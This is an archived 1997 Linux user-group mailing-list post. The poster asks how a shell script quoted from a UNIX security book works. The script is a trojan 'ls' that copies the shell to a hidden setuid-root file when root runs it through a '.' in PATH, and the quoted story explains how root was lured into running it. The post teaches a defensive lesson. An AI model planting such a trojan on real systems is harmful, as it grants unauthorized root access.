Mailing List Archive
Support open source code!
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
tlug: questions and a story
- To: tlug@example.com
- Subject: tlug: questions and a story
- From: Jim Schweizer <schweiz@example.com>
- Date: Wed, 05 Mar 1997 13:25:08 +0900 (JST)
- Content-Transfer-Encoding: 8bit
- Content-Type: text/plain; charset=us-ascii
- Organization: JPS Solutions
- Reply-To: tlug@example.com
- Sender: owner-tlug
--------------------------------------------------------
tlug note from Jim Schweizer <schweiz@example.com>
--------------------------------------------------------
Hi all,
Our local Maruzen bookstore just decided to stock most of the
O'Reilly books (my visa card is smoking;-) and I picked up
"Practical UNIX & Internet Security" and "Building Internet
Firewalls" (as well as "Running Linux","Learning the bash
Shell", "Webmaster in a Nutshell", and "Programming Perl")- a
little light reading for Spring break.
I picked this up from the Security book and don't understand
some things about this example:
Once upon a time there was a system manager from hell who
wouldn't reveal the root password to some authorized users.
These users noticed that the sysop from hell had "." at the
beginning of his shell search path. So, our happy band of dissed
users created an executable shell file named ls in the current
directory.
#!/bin/sh
cp /bin/sh ./stuff/junk/.superdude
chmod 4555 ./stuff/junk/.superdude
rm -f $0
exec /bin/ls ${1+"$@"}
Then they created:
% cd
% chmod 700 .
% touch ./-f
and told the sysop from hell that they had a funny file in their
directory which they couldn't delete. Well, wasn't that sysop in
for a surprise:-0
The two things I don't get are
rm -f $0
^^ - how does the shell script assign the scalar 0=ls?
and
exec /bin/ls ${1+"$@"}
^^^^^^^^^ - what's the reasoning behind this?
moral of the story: don't put "." at the beginning of your path.
Regards,
Jim S.
-----------------------------------------------------------------
a word from the sponsor will appear below
-----------------------------------------------------------------
The TLUG mailing list is proudly sponsored by TWICS - Japan's First
Public-Access Internet System. Now offering 20,000 yen/year flat
rate Internet access with no time charges. Full line of corporate
Internet and intranet products are available. info@example.com
Tel: 03-3351-5977 Fax: 03-3353-6096
- Follow-Ups:
- Re: tlug: questions and a story
- From: pal <pal@example.com>
- Re: tlug: questions and a story
- From: James Ellison <jellison@example.com>
- Re: tlug: questions and a story
- Prev by Date: tlug: PDF files + Netscape
- Next by Date: Re: tlug: questions and a story
- Prev by thread: tlug: PDF files + Netscape
- Next by thread: Re: tlug: questions and a story
- Index(es):
| Home Page | Mailing List | Linux and Japan | TLUG Members | Links |